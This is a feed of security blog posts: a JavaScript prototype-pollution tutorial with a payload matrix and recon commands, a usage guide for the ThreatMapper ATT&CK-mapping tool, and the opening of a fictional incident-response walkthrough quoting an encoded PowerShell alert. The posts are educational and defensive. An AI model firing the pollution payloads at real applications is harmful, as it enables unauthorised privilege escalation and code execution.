Team IT Security - 🕵️ Hacking

JavaScript Prototype Pollution Deep Dive : — Reconnaissance, Exploitation & Bug Bounty Guideline

Mon, 08 Jun 2026 06:26:08 +0200

From Recon to RCE — A comprehensive deep-dive into one of JavaScript’s most misunderstood vulnerabilitiesJavaScript Prototype Pollution Deep DiveTable of ContentsWhat Is Prototype Pollution?The JavaScript Prototype Chain — Deep DiveAttack Vectors & Entry PointsReconnaissance MethodologyExploitation Techniques — From XSS to RCEReal-World Bug Bounty Case StudiesAdvanced Exploit ChainsTooling & AutomationDefense & RemediationFull Python Scanner — Production-Ready1. What Is Prototype Pollution?Prototype Pollution is a vulnerability where an attacker injects properties into JavaScript’s Object.prototype. Because all objects inherit from Object.prototype, the injected property propagates to every object in the runtime — including window, document, process, and any object created thereafter.Why It MattersUnlike SQL injection or XSS, Prototype Pollution often serves as a primer — it doesn’t immediately give you RCE unless you chain it with another gadget. But when chained correctly, the impact ranges from XSS (browser) to Remote Code Execution (Node.js).Impact Level2. The JavaScript Prototype Chain — Deep DiveHow Inheritance Works// Every object has a hidden [[Prototype]]const user = { name: "Alice" };// user ---> Object.prototype ---> null// ^[[Prototype]]^When you access user.toString(), JavaScript:Looks for toString on user itself → not foundLooks on user.__proto__ (which is Object.prototype) → found!Executes it.The Vulnerability Mechanism// Normal operationconst target = {};const source = JSON.parse('{"name": "Alice"}');Object.assign(target, source);// target = { name: "Alice" } — safe// Polluted operationconst source = JSON.parse('{"__proto__": {"isAdmin": true}}');Object.assign(target, source);// target.__proto__.isAdmin = true// ALL objects now have isAdmin: trueWhy __proto__ Works as a KeyJSON parsing does NOT treat __proto__ specially — it's just a string key. When Object.assign() copies properties, it sets target.__proto__ which mutates the actual prototype chain.// Visual representationconst obj = {};obj.__proto__.polluted = true;// Equivalent to:Object.prototype.polluted = true;console.log({}.polluted); // trueconsole.log([].polluted); // trueconsole.log("".polluted); // true (string prototype chain)The Three Mutation MethodsMethod/Vul/Lib3. Attack Vectors & Entry PointsServer-Side Entry Points (Node.js)POST /api/usersContent-Type: application/json{"name": "test", "__proto__": {"isAdmin": true}}Where to look:JSON body parsing (Express body-parser, express.json())Query string parsing (qs library, Express built-in)Cookie parsingFile upload metadataGraphQL variablesWebSocket messagesClient-Side Entry Points (Browser)https://target.com/#__proto__[polluted]=truewindow.postMessage({__proto__: {evil: true}}, '*')localStorage.getItem('config') // parsed with JSON.parsews.send(JSON.stringify({__proto__: {innerHTML: ''}}))Common Vulnerable PatternsPattern 1: Object.assign / Spread Operatorapp.post('/api/update', (req, res) => { const user = getUser(req.session.userId); Object.assign(user, req.body); // VULNERABLE user.save();});Pattern 2: _.merge / $.extendconst config = _.merge(defaultConfig, userConfig); // VULNERABLE if userConfig comes from inputPattern 3: Deep Cloneconst cloned = JSON.parse(JSON.stringify(userInput)); // JSON.parse + JSON.stringify is SAFE — it strips __proto__// BUT: if you then merge cloned into another object...Pattern 4: URL Query Parsing// Using qs library with allowPrototypes: false (default is true in older versions)const parsed = qs.parse('a.__proto__.b=c'); // Older qs: parsed = { a: { __proto__: { b: 'c' } } }4. Reconnaissance MethodologyPhase 1: Identify DependenciesModern web apps are built on frameworks. Find the soft targets.# Client-side: Look for known vulnerable librariescurl -s https://target.com/assets/app.js | grep -iEo \ '(jquery|lodash|underscore|handlebars|vue|react|angular|backbone)[@-]?[0-9.]+'# Server-side: Check for Node.js indicatorscurl -sI https://target.com | grep -i 'x-powered-by\|server\|node'Version lookup table:Vulnerable tablePhase 2: Map All Input PointsBuild a comprehensive list of every location where user data is parsed into objects.# Spider the applicationgospider -s https://target.com -o spider_output# Extract endpoints from JavaScriptcurl -s https://target.com/assets/app.js | \ grep -oP 'POST|PUT|PATCH|GET.*(api|graphql|v1|v2|rest)' | \ sort -u > endpoints.txtPhase 3: Brute-Force Pollute VectorsTarget each endpoint with multiple payload variants.// Payload matrix — try ALL of these{"__proto__":{"polluted":"yes"}}{"__proto__":["polluted","yes"]}{"__proto__":{"__proto__":{"polluted":"yes"}}}{"constructor":{"prototype":{"polluted":"yes"}}}{"a":{"__proto__":{"polluted":"yes"}}}{"[__proto__]":{"polluted":"yes"}}{"__proto__.polluted":"yes"} // For query string parsersjPhase 4: Detection VerificationAfter sending the payload, verify if pollution took effect.Server-side check:# Send a probe payload that affects something observablecurl -s https://target.com/api/status | grep -i '"polluted":"yes"'# Or check if you get 200 instead of 403 on admin endpointsClient-side check (if you can execute JS):// Open console on the target page after triggering the pollutionObject.prototype.polluted === "yes"// Or({}).polluted === "yes"⚠️ Content NoticeDue to community guidelines and responsible disclosure practices, I was unable to include the complete live exploit chain, weaponized payloads, and full proof-of-concept demonstrations in this article.The concepts, impacts, and mitigation strategies are covered here for educational and defensive security purposes. Readers interested in the full technical research, complete exploit analysis, and detailed proof-of-concept examples can refer to the corresponding GitHub repository linked with this article.This content is intended solely for security research, awareness, and defensive testing in authorized environments.Reed Full Blog: https://github.com/SecurityTalent/write-upGitHub: SecurityTalent | Medium: Security Talent | Twitter: Securi3yTalent | Facebook: Securi3ytalent | Telegram: Securi3yTalent#CyberSecurity #BugBounty #BugBountyHunter #EthicalHacking #InfoSec #WebSecurity #ApplicationSecurity #AppSec #CloudSecurity #FrontendSecurity #WebDevelopment #JavaScript #ReactJS #Laravel #NodeJS #DevSecOps #OWASP #SecretsManagement #GitHub #GitHubDorks #SourceMaps #EnvFiles #SecurityResearch #PenetrationTesting #RedTeam #BlueTeam #CloudComputing #AWS #Azure #GoogleCloud #VibeCoding #AI #SecureCoding #DeveloperSecurity #TechBlog #ProgrammingJavaScript Prototype Pollution Deep Dive : — Reconnaissance, Exploitation & Bug Bounty Guideline was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

OSCP Windows Enumeration Checklist: My Complete Privilege Escalation Workflow for Every Box

Mon, 08 Jun 2026 06:26:28 +0200

Learn the exact Windows enumeration process for OSCP, including WinPEAS analysis, credential hunting, token abuse, service…Continue reading on InfoSec Write-ups »

ThreatMapper: I Built a Self-Hosted AI Threat Intelligence Platform — Here’s How to Use It

Mon, 08 Jun 2026 06:30:09 +0200

Map adversary behaviour to MITRE ATT&CK in seconds, compare against 160+ APT groups, and generate PDF reports — all running locally with your own LLM keys.Table of ContentsThe ProblemWhat ThreatMapper DoesArchitecture in BriefSetting Up (10 Minutes)Core Workflow: Analysing a Threat ReportThe Navigator: Your ATT&CK WorkspaceAPT Attribution Deep-Dive: Three Compare ModesTwo Databases: Actor Profiles and Your Report LibraryGenerating ReportsUsing the AI Chat AssistantWorking with All Three ATT&CK DomainsAPI Usage (Headless / CI Integration)Keeping ATT&CK Data FreshTips for AnalystsSecurity ConsiderationsWhat’s Coming NextFinal ThoughtsThe tool:GitHub - anpa1200/threatmapper: AI-powered MITRE ATT\&CK threat intelligence platform - D3.js navigator, APT comparison, Claude/GPT-4o/Gemini analysis, PDF reportsDocs:ThreatMapper - Self-Hosted AI Threat Intelligence | ThreatMapperThe ProblemEvery threat intelligence analyst knows the workflow: you receive a malware report, an IR summary, or a threat feed entry, and you need to translate it into ATT&CK technique IDs so you can slot it into a detection backlog or a purple-team plan.Doing this manually is slow. You read the report, recognise a behaviour (“the implant used scheduled tasks for persistence”), pull up the ATT&CK website, search for the technique, copy the ID. Repeat 20 times for a single report. Then someone asks: “Does this look like APT29?” — and you start manually cross-referencing technique lists.There are commercial platforms that do this — but they are expensive, require data to leave your environment, and often treat ATT&CK as a secondary feature behind proprietary kill-chains.ThreatMapper is my attempt to solve this for analysts who want a self-hosted, privacy-first, open-source option that uses the LLM API keys they already have.What ThreatMapper DoesIn one sentence: you give it a threat report, it gives you ATT&CK technique IDs, APT group matches, confidence scores, and a PDF.Concretely:AI Analysis — upload a PDF, DOCX, or TXT file (or paste text), pick Claude, GPT-4o, or Gemini, and get a streamed extraction of every ATT&CK technique the LLM identifies with evidence snippets and confidence scoresATT&CK Navigator — an interactive heatmap of the full ATT&CK matrix (Enterprise, Mobile, ICS) where you build and explore your TTP layerAPT Attribution — automatic Jaccard similarity ranking of every extraction against 174+ named ATT&CK threat groups and 56+ named campaigns (e.g. “Operation Ghost”, “SolarWinds Compromise”)Compare — deep side-by-side comparison of your TTP set against groups, MITRE named campaigns, or your own stored report library; with visual matrix diff, tactic breakdown chart, and gap analysisExport — ATT&CK Navigator-compatible JSON layers and multi-page PDF reports suitable for executive briefingsEverything runs locally in Docker. Your threat reports never leave your machine.(With local or private LLM)Architecture in BriefThreatMapper is four containers:The backend ingests ATT&CK STIX 2.1 bundles directly from MITRE’s GitHub repository using pure Python — no third-party ATT&CK library, fully compatible with Python 3.12. All three ATT&CK domains (Enterprise, Mobile, ICS) are parsed and stored in PostgreSQL with JSONB arrays for the STIX arrays.LLM calls go directly from the FastAPI backend to Anthropic / OpenAI / Google using their official SDKs. Your API keys never touch a third-party service beyond the LLM provider itself.Setting Up (10 Minutes)PrerequisitesDocker + Docker ComposeAn API key for at least one of: Anthropic (Claude), OpenAI, Google GeminiStep 1: Clone and configuregit clone https://github.com/anpa1200/threatmapper.gitcd threatmappercp .env.example .envImportant: you must create .env before running docker compose up. Without it the container starts with empty API keys and AI Analysis returns 500.Open .env and add your keys. You only need one:ANTHROPIC_API_KEY=sk-ant-...# OPENAI_API_KEY=sk-...# GEMINI_API_KEY=AIza...DB_PASS=choose_a_strong_passwordIf you want a faster first start and only need Enterprise ATT&CK, set:ATTCK_DOMAINS=enterprise-attackThis downloads ~35 MB instead of ~105 MB.Step 2: Startdocker compose upThe first start downloads and ingests ATT&CK data automatically. Watch progress:docker compose logs -f apiYou’ll see something like:Parsing enterprise-attack-19.1.json ... Parsed: 15 tactics, 760 techniques, 174 groups, 56 campaigns, 9100+ usagesFinished ingesting enterprise-attack v19.1INFO: Application startup complete.This takes 5–15 minutes depending on your network speed. Subsequent startups are instant (data is cached in the PostgreSQL volume).Step 3: OpenFrontend: http://localhost:3000API docs (Swagger UI): http://localhost:8000/docsCore Workflow: Analysing a Threat ReportThis is the killer feature and what most analysts will use day-to-day.Upload your reportNavigate to Analyze in the sidebar. You’ll see:A provider dropdown (Claude / GPT-4o / Gemini)An optional model override (defaults to claude-opus-4-8, gpt-4o, gemini-2.0-flash)A domain selector (enterprise-attack for most corporate IR work)A text area or file uploadFor a PDF analysis report:Select Claude (or your preferred provider)Leave the domain as enterprise-attackClick Choose file and upload your PDFClick Analyse with AIYou’ll immediately see the LLM’s response streaming in the output box — token by token, just like ChatGPT. This is not a spinner that makes you wait: you can read the thinking as it happens.Reading the resultsWhen the stream completes, three tabs appear:Techniques tab — the core output. Each row shows:FieldExampleATT&CK IDT1059.001NamePowerShellTacticExecutionConfidence92%Evidence”executed a base64-encoded PowerShell payload”The evidence field is a direct quote or paraphrase from your source document — you can use it to trace every mapping back to its origin in the text. High confidence (≥ 80%) means the text explicitly described the behaviour; lower scores mean it was inferred.APT Matches tab — the attribution layer. Computed locally using Jaccard similarity between your extracted techniques and every named ATT&CK group’s known TTP set. The top 10 are shown with:Similarity score (0–100%)Shared technique countList of the overlapping technique IDsA match above 25–30% is worth investigating. Don’t treat this as definitive attribution — use it as a lead for further research.Raw Response — the LLM’s full JSON output. Useful for debugging when the model outputs something unexpected.Inject into NavigatorClick → Inject into Navigator to push all extracted techniques into your live Navigator layer. You can then:See the techniques highlighted on the full ATT&CK matrixOverlay an APT group to visualise the behavioural overlapExport as an ATT&CK Navigator JSON layerThe Navigator: Your ATT&CK WorkspaceThe Navigator is the central hub. It renders the full ATT&CK matrix as an interactive heatmap with D3.js zoom/pan.Building a layerClick any technique cell to add it to your layer (it turns red). Click again to deselect. For sub-techniques, click the small ▶ arrow to expand the parent cell and see the sub-technique rows.Practical tip: use the search box to find techniques by name or ID without manually scanning the matrix. Type T1059 to jump to all Command and Scripting Interpreter techniques, or type phish to find all phishing-related techniques.Overlaying an APT groupGo to APT Library and find your group of interestClick Overlay on NavigatorReturn to NavigatorThe matrix now uses three colours:Red — in your layer onlyBlue — in the APT group’s profile onlyAmber — in both (the overlap)This visual immediately answers: “Which of this group’s known techniques am I not already detecting?”Importing an existing layerIf you already have ATT&CK Navigator layers from previous work, click ↑ Import layer and upload the JSON. ThreatMapper will load it as your active layer, which you can then enrich with AI analysis or compare against APT groups.Saving and Loading Named LayersOnce you have built a TTP layer — whether through AI analysis, manual selection, or an APT campaign overlay — you can save it to the database with a name and reload it in any future session.Why this mattersWithout persistence, every session starts blank. You would have to re-inject or re-select all your techniques each time you come back to a piece of work. Named layers let you:Bookmark a specific investigation. Save “Lazarus Q1 2025 incident” at 47 techniques and return to it a week later exactly where you left off.Build a fingerprint library. Save a layer for each major campaign you track — “Operation Ghost TTPs”, “SolarWinds Compromise TTPs” — and reload any of them for comparison without re-running AI analysis.Maintain a baseline. Keep a “What we detect” layer with your detection coverage and a “What we’ve seen” layer of your observed incidents. Load each into a fresh session to compare.Share work across team members. Layers are stored in the shared PostgreSQL database, so a layer saved by one analyst is visible to all.Saving a layerSelect your techniques in Navigator (they turn red)Click ↓ Save layer in the toolbar — this button appears only when at least one technique is selectedEnter a descriptive name (e.g. “MuddyWater CTI analysis — April 2025”)Press Enter or click SaveThe layer is immediately written to the database. The technique IDs are stored in sorted, deduplicated form together with the domain.Loading a layerClick 📂 Load layer in the toolbar (always visible)A list of all saved layers appears, each showing the name, technique count, domain, and last-modified dateClick Load — the saved layer replaces your current selection entirelyTo delete a layer you no longer need, click the ✕ button next to it in the Load dialog and confirm.APT Attribution Deep-Dive: Three Compare ModesThe Compare view has three modes selectable from a switcher at the top of the page.Mode 1 — Groups (DB 1)With techniques selected in Navigator (or injected from an AI analysis), navigate to Compare, make sure Groups (DB 1) is selected, and click Compare vs APT Groups. This ranks all 174+ threat groups by Jaccard similarity.Click any group to open the four-tab detail view:Overview — similarity score, shared technique chips (amber), techniques only in your layer (red). Answers: “How much of our observed behaviour matches this group’s known playbook?”Tactic Breakdown — stacked bar per kill-chain phase: shared / user-only / APT-only. Reveals where in the kill chain the overlap is concentrated.Visual Diff — compact colour-strip matrix. Best for presentations.Gap Analysis — every technique in the group’s known profile not in your layer. This is your detection backlog.Mode 2 — Campaigns (DB 1)Switch to Campaigns (DB 1) and click Compare vs Campaigns. This ranks all 56+ named MITRE operations by Jaccard similarity.Why this is more precise than group comparison: A group’s aggregate profile spans years. A campaign profile is one specific attack. Matching your TTPs against C0024 (SolarWinds Compromise) at 40% is a sharper lead than matching against G0016 (APT29) at 15%.Mode 3 — Reports (DB 2)Switch to Reports (DB 2). The left panel lists every AI analysis you have ever run. Click any report to re-run Jaccard comparison against all ATT&CK groups — without re-calling the LLM.Use this for retrospective attribution after ATT&CK releases new group data, or to cluster multiple incidents under a common actor.Practical attribution workflowRun AI analysis on your incident data (give it a descriptive name)Inject extracted techniques into NavigatorCompare → Groups mode: look for similarity > 25%Compare → Campaigns mode: check if the top group has a campaign that fits the timelineGap Analysis tab: use the technique gap as a structured hunt checklistDownload the PDF report for your findingsTwo Databases: Actor Profiles and Your Report LibraryWhen you dig into attribution you quickly realise there are two different things you want to compare against:What MITRE says groups have done — the curated ATT&CK dataset of group TTP profiles, including named campaigns (specific operations like “Operation Ghost”)What you have actually observed — your own library of analysed reports, each with its own extracted TTP mappingThreatMapper v0.3 builds both into a single comparison workflow via three modes in the Compare view.DB 1: MITRE Actor Profiles and Named CampaignsThe ATT&CK STIX 2.1 bundle contains more than just group TTP profiles. It also includes:campaign objects — named operations with their own ATT&CK IDs (e.g. C0023 = "Operation Ghost", C0025 = "2016 Ukraine Electric Power Attack")attributed-to relationships — which group conducted which campaignuses relationships at the campaign level — the specific techniques observed in each named operation (often different from the group's aggregate profile)ThreatMapper parses all of this during ATT&CK ingestion. The result is two searchable, comparable datasets that both live in DB 1:DatasetWhat it containsID formatAPT GroupsAggregate TTP profile of each named threat groupG0001 — G0174+CampaignsTTP profile of each named operation/campaignC0001 — C0063+Why campaigns matter: A group’s aggregate profile is the union of everything ever attributed to them across all operations and years. A campaign profile is specific to one attack. Comparing your incident TTPs against campaigns is often more discriminating than comparing against the full group — an incident that matches C0023 (Operation Ghost) at 45% similarity is a more specific lead than a match against G0016 (APT29) at 15%.Viewing campaigns in the APT LibraryThe APT Library now has two tabs per group:Techniques — the full aggregate TTP list (existing behaviour)Campaigns (DB 1) — all named operations attributed to this groupEach campaign card shows the date range, technique count, and ATT&CK ID. Click to expand and see the full technique list with the use description from STIX.The “Add to my TTPs” button on each campaign card pushes all of that campaign’s techniques into your Navigator layer — useful for building a “this specific operation’s TTP fingerprint” layer to compare against your detection coverage.DB 2: Your Report LibraryEvery time you run an AI analysis in ThreatMapper, the result is stored: the extracted techniques, the summary, the APT matches, and the provider/model used. DB 2 is this library of past analyses.Access it via Compare → Reports (DB 2).The left panel lists every completed report session with:Name (the filename or label you gave it when you uploaded)Technique countDomainProvider and model usedDateClick any report to run a fresh Jaccard comparison of that report’s extracted techniques against all ATT&CK groups. This answers: “If I come back to this report from three months ago — which groups match its TTP profile?”This is useful in a few scenarios:Retrospective attribution: You analysed a report before you had a strong hypothesis about the actor. A new ATT&CK version was released that added new groups or techniques. Rerun the comparison against the updated ATT&CK data without re-running the expensive LLM analysis.Cross-incident correlation: If two reports from different incidents both have high similarity to the same APT group, that’s a data point for clustering the incidents under the same actor.Building a baseline: Accumulate 20 reports over a quarter. In the Reports library you can see at a glance which groups are recurring themes across your incident set — a form of environmental threat profiling.The three Compare modesModeWhat you compareAgainstGroups (DB 1)Your selected TTPs (from Navigator)All 174+ ATT&CK groupsCampaigns (DB 1)Your selected TTPs (from Navigator)All named MITRE campaignsReports (DB 2)A stored report’s extracted TTPsAll 174+ ATT&CK groupsUse the mode switcher at the top of the Compare page to move between them.API for both databasesCompare against campaigns:curl -X POST "http://localhost:8000/api/apt/campaigns/compare?domain=enterprise-attack&top_n=10" \ -H "Content-Type: application/json" \ -d '{"technique_ids": ["T1566.001", "T1059.001", "T1078", "T1021.001"]}'List your stored report sessions:curl "http://localhost:8000/api/analyze/sessions?limit=20" | python -m json.toolRe-compare a stored report:SESSION_ID="550e8400-e29b-41d4-a716-446655440000"curl -X POST "http://localhost:8000/api/analyze/sessions/$SESSION_ID/compare?top_n=10"List campaigns for a specific group:curl "http://localhost:8000/api/apt/campaigns?domain=enterprise-attack&group_id=G0016"Generating ReportsThreatMapper generates two types of PDF reports.Analysis reportFrom the Analyze page, after a completed analysis, click Download PDF. The report is formatted for sharing with management or a client and includes:Cover page with provider, model, domain, session ID, and timestampExecutive summary (the AI-generated TL;DR)Extracted techniques table sorted by confidence descendingAPT attribution section with the top 10 Jaccard matchesTactic coverage breakdown showing how the techniques distribute across the kill chainNavigator layer reportFrom the Navigator, click ↓ PDF in the toolbar. This generates a lighter report listing all techniques in your current layer with their ATT&CK IDs, tactics, and platforms — useful as a rapid deliverable for a purple-team session or a detection engineering sprint.Using the AI Chat AssistantEvery technique in the detail panel has an embedded AI chat. This is not a generic chatbot — it is a threat intelligence assistant with the full ATT&CK description of the selected technique already in context.Practical prompts that work well:For detection engineering:“Write a SIGMA rule for detecting this technique on Windows via Sysmon events”For understanding evasion:“How do attackers modify this technique to avoid common detections?”For hunting:“What should I look for in Windows Security event logs to hunt for this technique? Give me specific event IDs and field values.”For red teaming context:“Which tools in the open-source red team ecosystem implement this technique?”For correlation:“Which techniques are commonly chained with this one in post-exploitation workflows?”The context field at the bottom of the chat lets you paste additional information — for example, a log snippet or a list of technique IDs from your current investigation. This gives the assistant grounding in your specific situation. The context field accepts up to 8,000 characters.Working with All Three ATT&CK DomainsThreatMapper supports Enterprise, Mobile, and ICS ATT&CK out of the box.Switch domains using the Domain dropdown in the Navigator toolbar or the Analyze page.Enterprise ATT&CK — 641 techniques, 163 groups. Use for traditional IT infrastructure incidents: Windows/Linux/macOS endpoints, cloud workloads, Active Directory environments.Mobile ATT&CK — covers Android and iOS threat behaviours. Useful for incidents involving mobile device management (MDM) bypass, spyware, or mobile-targeting APT campaigns.ICS ATT&CK — covers operational technology and industrial control systems. Use for incidents involving SCADA, PLCs, HMIs, or critical infrastructure.Each domain has its own set of tactics, techniques, and APT groups. When you run an AI analysis, select the appropriate domain so the Jaccard comparison runs against groups known for activity in that domain.API Usage (Headless / CI Integration)ThreatMapper exposes a full REST API. You can drive the entire workflow programmatically.Analyse a report via APIcurl -X POST http://localhost:8000/api/analyze \ -F "provider=claude" \ -F "domain=enterprise-attack" \ -F "file=@incident_report.pdf" \ | python -m json.toolResponse:{ "session_id": "550e8400-e29b-41d4-a716-446655440000", "provider": "claude", "model": "claude-opus-4-8", "summary": "The report describes a spearphishing campaign ...", "techniques": [ { "attack_id": "T1566.001", "name": "Spearphishing Attachment", "tactic": "initial-access", "confidence": 0.95, "evidence": "the email contained a malicious Excel attachment" } ], "apt_matches": [ { "group_attack_id": "G0016", "group_name": "APT29", "similarity": 0.34, "shared_count": 8, "shared_techniques": ["T1566.001", "T1059.001", ...] } ]}Compare a known technique set via APIcurl -X POST "http://localhost:8000/api/apt/compare?domain=enterprise-attack&top_n=5" \ -H "Content-Type: application/json" \ -d '{"technique_ids": ["T1566.001", "T1059.001", "T1078", "T1021.001", "T1003.001"]}' \ | python -m json.toolManage saved layers via API# List all saved layers (optionally filter by domain)curl "http://localhost:8000/api/layers?domain=enterprise-attack" | python -m json.tool# Save a layercurl -X POST http://localhost:8000/api/layers \ -H "Content-Type: application/json" \ -d '{"name": "MuddyWater Q1 indicators", "domain": "enterprise-attack", "technique_ids": ["T1566.001", "T1059.001", "T1078", "T1021.001"]}'# Load a specific layer (returns technique_ids)LAYER_ID="550e8400-e29b-41d4-a716-446655440000"curl "http://localhost:8000/api/layers/$LAYER_ID" | python -m json.tool# Delete a layercurl -X DELETE "http://localhost:8000/api/layers/$LAYER_ID"Stream an analysis (Python example)import httpx, jsonwith httpx.stream( "POST", "http://localhost:8000/api/analyze/stream", data={"provider": "claude", "domain": "enterprise-attack"}, files={"file": open("report.pdf", "rb")}, timeout=300,) as r: for line in r.iter_lines(): if line.startswith("data: "): event = json.loads(line[6:]) if event["type"] == "token": print(event["content"], end="", flush=True) elif event["type"] == "result": print("\n\nFinal techniques:") for t in event["data"]["techniques"]: print(f" {t['attack_id']} ({t['confidence']*100:.0f}%) - {t['name']}") elif event["type"] == "error": print(f"\nError: {event['message']}")Keeping ATT&CK Data FreshATT&CK releases new versions periodically (approximately twice a year). ThreatMapper checks for new versions daily at 03:00 UTC via a Celery Beat job.The sidebar footer shows a pulsing amber indicator when a new version is available. Trigger an update:# Quick API callcurl -X POST http://localhost:8000/api/sync/trigger# Check what version you have vs what's availablecurl http://localhost:8000/api/sync/statusThe sync downloads only the new bundle version and ingests it alongside the existing data without deleting anything. Both versions remain queryable — endpoints accept an optional ?version=19.1 parameter to target a specific release.Tips for AnalystsCalibrate your confidence threshold. I recommend treating < 50% confidence as noise until you validate it manually. The LLM is trying hard to find ATT&CK mappings, which means it will sometimes stretch an inference. Use the evidence snippet to sanity-check every mapping.Use the Gap Analysis as a hunt checklist. When you match against an APT group in Compare, the Gap Analysis tab shows every technique in their known profile that you haven’t covered. This is an excellent input for a structured hunt — you’re essentially asking “what would we need to observe to confirm this attribution?”Chain features for maximum value. The best workflow is: AI Analysis → inject into Navigator → Compare against APT groups → Gap Analysis → export PDF. Each step builds on the last.Chat is good for detection rules. The AI assistant is particularly strong at generating SIGMA rules, KQL queries, and Splunk SPL from ATT&CK technique IDs. Give it the full ATT&CK technique description plus any specific context from your environment (OS, logging stack) and you’ll get useful starting points rather than generic templates.Import your existing layers. If your team already maintains ATT&CK Navigator layers for your environment (e.g. a “what we detect” layer and a “what we’ve seen” layer), import them via the ↑ Import button. ThreatMapper will let you compare them against APT profiles and run AI chat against the techniques in the layer.Save named layers as investigation checkpoints. After any significant piece of work — a completed AI analysis, a finished APT comparison session, a purple-team prep layer — click ↓ Save layer and give it a meaningful name. This takes 10 seconds and means you never lose work between sessions. You can reload any saved layer instantly from 📂 Load layer without re-running analysis.Use text paste for quick triage. You don’t need a formatted document. Paste raw Slack thread text, a SIEM alert body, or a vendor advisory into the text box. The AI is good at extracting signal from noisy, informal text.Security ConsiderationsThreatMapper is designed for internal/intranet use. It has no built-in authentication — anyone who can reach the Docker network can use it.For a team deployment:Set a strong DB_PASS in .envPut ThreatMapper behind nginx / Caddy with TLS and HTTP Basic Auth (or integrate with your identity provider via OAuth)Run the Docker containers on an internal network that is not directly internet-accessibleThe .env file containing your LLM API keys should have chmod 600 and never be committed to gitYour threat intelligence reports are stored in PostgreSQL inside the Docker volume. If you need to comply with data handling policies, deploy ThreatMapper on infrastructure that meets those policies — since it’s self-hosted, you retain full control.What’s Coming NextThe tool is functional but there is plenty of room to grow. Things I’m actively thinking about:TAXII/STIX import — accept threat intelligence directly from TAXII feeds (MISP, OpenCTI, commercial CTI platforms)Team collaboration — shared TTP layers with user namespacingDetection coverage overlay — import your existing SIGMA rule library and visualise which ATT&CK techniques you have coverage for vs which are blind spotsAutomatic APT tracking — when ATT&CK releases a new version that adds techniques to a group you’re tracking, send a notificationFinal ThoughtsThe core idea behind ThreatMapper is that the heavy lifting of ATT&CK mapping — reading a report, recognising a technique, looking it up, comparing it — is exactly the kind of repetitive, pattern-matching work that LLMs are well-suited for.The analyst’s judgement is still essential: deciding which mappings to trust, what the attribution implications are, what to do about the gap analysis. But the mechanical translation layer — text to ATT&CK IDs — should not take most of your time.ThreatMapper tries to handle that translation layer so you can spend your time on the interesting parts.The project is open source under the MIT licence. If you find it useful, have feature requests, or find bugs, open an issue on GitHub.GitHub: https://github.com/anpa1200/threatmapperAPI Docs: http://localhost:8000/docs (after starting with docker compose up)ThreatMapper uses the MITRE ATT&CK® framework. ATT&CK is a registered trademark of The MITRE Corporation. This project is not affiliated with or endorsed by MITRE.Follow for practical cybersecurity researchIf you’re interested in Offensive security, AI security, real-world attack simulations, CTI, and detection engineering — this is exactly what I focus on.Stay connected:→ Subscribe on Medium: medium.com/@1200km→ Connect on LinkedIn: andrey-pautov→ GitHub — tools & labs: github.com/anpa1200→ Contact: 1200km@gmail.comAndrey PautovThreatMapper: I Built a Self-Hosted AI Threat Intelligence Platform — Here’s How to Use It was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

CTI as a Code in Practice: Reactive Investigation — LifeTech Pharma

Mon, 08 Jun 2026 06:30:34 +0200

A complete walkthrough of the methodology applied to a real training scenario: pharmaceutical IP theft, dual entry points, and a DCSync that changes everything.All organizations, names, and data are fictional. This is training assignment A01 from the CTI as a Code repository.Based on the methodology: “CTI as a Code”CTI as a Code: Complete Step-by-Step MethodologyContentsThe ScenarioStep 00: Clone, Initialize, and Fill the TemplateStep 0: Intake — What the First Call CapturesStep 1–2: Project Setup and ScopeStep R1: Evidence Inventory — What Exists and What Is MissingStep R1.5: Hands-On Evidence Analysis — VS Code Investigation1. CrowdStrike Alert — JSON in VS Code2. Decode the PowerShell Payload3. M365 Message Trace — Rainbow CSV4. Azure AD Sign-In Analysis5. VPN Log Analysis6. NGFW Log Analysis — Rainbow CSV7. SQL Audit Log Analysis8. Windows Security Event Log Analysis9. Cross-File Pivot — VS Code Global Search10. IOC Enrichment — REST Client11. Sandbox Analysis — Submit the Binary12. Static Binary Analysis — Hex Editor + Terminal13. Infrastructure Pivot — REST Client + Global Search14. Splunk Correlation (SIEM Validation)Step R2: Timeline — Two Paths, One ActorStep R3: Claims Ledger — Every Assertion Traced to EvidenceStep R4: ATT&CK Mapping — Where Detection FailedStep R5: Attribution Assessment — Same Actor or Two?Step R6: Detection Rules — Four That Would Have Changed the OutcomeStep R7: Deliverables — What Each Stakeholder GetsThe Git History: What a Completed Investigation Looks LikeKey LessonsThe ScenarioLifeTech Pharma Ltd. is a mid-sized Israeli pharmaceutical company in Rehovot. It develops and manufactures generic drugs and biological APIs, exports to the US, EU, and MENA, and recently signed a $52 million licensing deal with a US biopharma partner. The signed formula files are stored on SERVER-RD-02\LicenseDeals\USPartner2024\ — 47 files, approximately 380 MB compressed.On Friday, 15 November 2024 at 18:47 IST, the on-call SOC analyst receives a CrowdStrike behavioral detection:ALERT: Suspicious PowerShell ActivitySeverity: High — Behavioral IOAHost: WS-CFO-01.lifetechpharma.local [Michal Cohen, CFO]Process: powershell.exe (PID 3784)Parent: OUTLOOK.EXE (PID 2240)CommandLine: powershell.exe -NonI -W Hidden -Enc JABjAD0ATgBlAHcA...Timestamp: 2024-11-15T18:42:33ZThat’s the visible trigger. The actual breach started 24 days earlier — and the alert is the second of two entry points, not the first.Step 00: Clone, Initialize, and Fill the TemplateBefore the phone rings. This step takes three minutes and is done once per investigation — ideally before the alert even comes in, or in the first five minutes after hanging up the initial call.1. Clone the repository (one-time setup)If you have not cloned CTI_as_a_Code yet, do this once on your analyst workstation:cd ~git clone https://github.com/anpa1200/CTI_as_a_Code.gitYou will never modify this clone. It is your template source. Leave it as-is and pull updates periodically:cd ~/CTI_as_a_Code && git pull2. Create your investigations foldermkdir -p ~/investigationsUse any path you prefer — just keep it consistent across all cases. Do not create investigations inside the CTI_as_a_Code clone.3. Copy the reactive template for this casecp -r ~/CTI_as_a_Code/templates/reactive/ ~/investigations/lifetech-2024-11Naming convention: [org-slug]-[YYYY-MM]. One folder per case. Verify the structure:ls ~/investigations/lifetech-2024-11/tree ~/investigations/lifetech-2024-11/Expected:00-scope/ 01-evidence/ 02-sources/ 03-analysis/04-detections/ 05-deliverables/ 06-ai-outputs/ 07-feedback/README.md intake-form.md project.yml4. Initialize git inside the case foldercd ~/investigations/lifetech-2024-11git initgit add .git commit -m "PROJ-2024-001: scaffold initialized from reactive template"This is commit zero. Its purpose is to prove — to a lawyer, an auditor, or yourself — exactly what state you started from before any analysis began.5. Fill in 